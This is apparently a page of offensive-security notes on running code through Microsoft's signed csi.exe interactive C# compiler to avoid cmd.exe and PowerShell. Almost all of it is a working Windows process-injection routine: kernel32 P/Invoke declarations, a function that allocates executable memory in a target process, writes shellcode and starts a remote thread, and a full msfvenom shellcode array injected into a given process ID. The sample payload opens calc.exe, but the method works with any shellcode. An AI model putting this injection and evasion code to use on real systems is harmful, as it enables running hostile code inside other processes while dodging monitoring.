Code Execution
Using Microsoft's signed Interactive C# compiler included with C# and Visual Studio 2015+ you have direct access to system calls without using cmd.exe or powershell.exe. Still subject to AMSI.
C:\Users\Whatever>"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Roslyn\csi.exe"
Microsoft (R) Visual C# Interactive Compiler version 3.11.0-4.21403.6 ()
Copyright (C) Microsoft Corporation. All rights reserved.
Type "#help" for more information.
> using System;
> using System.Diagnostics;
> using System.Threading;
> using System.Runtime.InteropServices;
>
> public class kernel32
. {
. //openprocess
. [Flags]
. public enum ProcessAccessFlags : uint
. {
. All = 0x001F0FFF,
. Terminate = 0x00000001,
. CreateThread = 0x00000002,
. VirtualMemoryOperation = 0x00000008,
. VirtualMemoryRead = 0x00000010,
. VirtualMemoryWrite = 0x00000020,
. DuplicateHandle = 0x00000040,
. CreateProcess = 0x000000080,
. SetQuota = 0x00000100,
. SetInformation = 0x00000200,
. QueryInformation = 0x00000400,
. QueryLimitedInformation = 0x00001000,
. Synchronize = 0x00100000
. }
.
. [DllImport("kernel32.dll", SetLastError = true)]
. public static extern IntPtr OpenProcess(
. ProcessAccessFlags processAccess,
. bool bInheritHandle,
. int processId
. );
. public static IntPtr OpenProcess(Process proc, ProcessAccessFlags flags)
. {
. return OpenProcess(flags, false, proc.Id);
. }
. //end of openprocess
.
. //VirtualAllocEx
. [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
. public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
. uint dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
.
. [Flags]
. public enum AllocationType
. {
. Commit = 0x1000,
. Reserve = 0x2000,
. Decommit = 0x4000,
. Release = 0x8000,
. Reset = 0x80000,
. Physical = 0x400000,
. TopDown = 0x100000,
. WriteWatch = 0x200000,
. LargePages = 0x20000000
. }
.
. [Flags]
. public enum MemoryProtection
. {
. Execute = 0x10,
. ExecuteRead = 0x20,
. ExecuteReadWrite = 0x40,
. ExecuteWriteCopy = 0x80,
. NoAccess = 0x01,
. ReadOnly = 0x02,
. ReadWrite = 0x04,
. WriteCopy = 0x08,
. GuardModifierflag = 0x100,
. NoCacheModifierflag = 0x200,
. WriteCombineModifierflag = 0x400
. }
. //end of virtualallocex
.
. [DllImport("kernel32")]
. public static extern IntPtr CreateRemoteThread(
. IntPtr hProcess,
. IntPtr lpThreadAttributes,
. uint dwStackSize,
. IntPtr lpStartAddress, // raw Pointer into remote process
. IntPtr lpParameter,
. uint dwCreationFlags,
. out uint lpThreadId
. );
. /*
. [DllImport("kernel32.dll")]
. static extern IntPtr CreateRemoteThread(IntPtr hProcess,
. IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress,
. IntPtr lpParameter, uint dwCreationFlags, out IntPtr lpThreadId);
. */
.
. [DllImport("kernel32.dll", SetLastError = true)]
. static public extern bool CloseHandle(IntPtr hHandle);
.
.
.
. [DllImport("kernel32.dll", SetLastError = true)]
. public static extern bool WriteProcessMemory(
. IntPtr hProcess,
. IntPtr lpBaseAddress,
. byte[] lpBuffer,
. Int32 nSize,
. out IntPtr lpNumberOfBytesWritten);
.
. [DllImport("kernel32.dll", SetLastError = true)]
. public static extern bool WriteProcessMemory(
. IntPtr hProcess,
. IntPtr lpBaseAddress,
. [MarshalAs(UnmanagedType.AsAny)] object lpBuffer,
. int dwSize,
. out IntPtr lpNumberOfBytesWritten);
. }
>
> public void injectSc(byte[] arr, int procId)
. {
.
.
. var EXECUTE_READ_WRITE = kernel32.MemoryProtection.ExecuteReadWrite;
. var PROCESS_ALL_ACCESS = kernel32.ProcessAccessFlags.All;
. var MEM_RESERVE = kernel32.AllocationType.Reserve;
. var MEM_COMMIT = kernel32.AllocationType.Commit;
. IntPtr temp;
. IntPtr nullptr = (IntPtr)null;
. uint temp2;
.
. IntPtr processHandle = kernel32.OpenProcess(PROCESS_ALL_ACCESS, false, procId); //can also use PROCESS_VM_WRITE then PROCESS_CREATE_THREAD
. IntPtr remoteBuffer = kernel32.VirtualAllocEx(processHandle, nullptr, (uint)arr.Length, (MEM_RESERVE | MEM_COMMIT), EXECUTE_READ_WRITE);
. kernel32.WriteProcessMemory(processHandle, remoteBuffer, arr, arr.Length, out temp);
. IntPtr remoteThread = kernel32.CreateRemoteThread(processHandle, nullptr, 0, remoteBuffer, nullptr, 0, out temp2 );
. kernel32.CloseHandle(processHandle);
.
.
.
. }
>//msfvenom -p windows/x64/exec CMD=calc.exe -f csharp
> byte[] buf = new byte[276] {
. 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
. 0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
. 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
. 0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
. 0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
. 0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
. 0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
. 0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
. 0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
. 0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
. 0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
. 0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
. 0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
. 0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
. 0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
. 0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
. 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
. 0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
. 0x63,0x2e,0x65,0x78,0x65,0x00 };
>
> int procId = 5620;
> injectsc(buf,procId)
(1,1): error CS0103: The name 'injectsc' does not exist in the current context
> injectSc(buf,procId)Last updated
Was this helpful?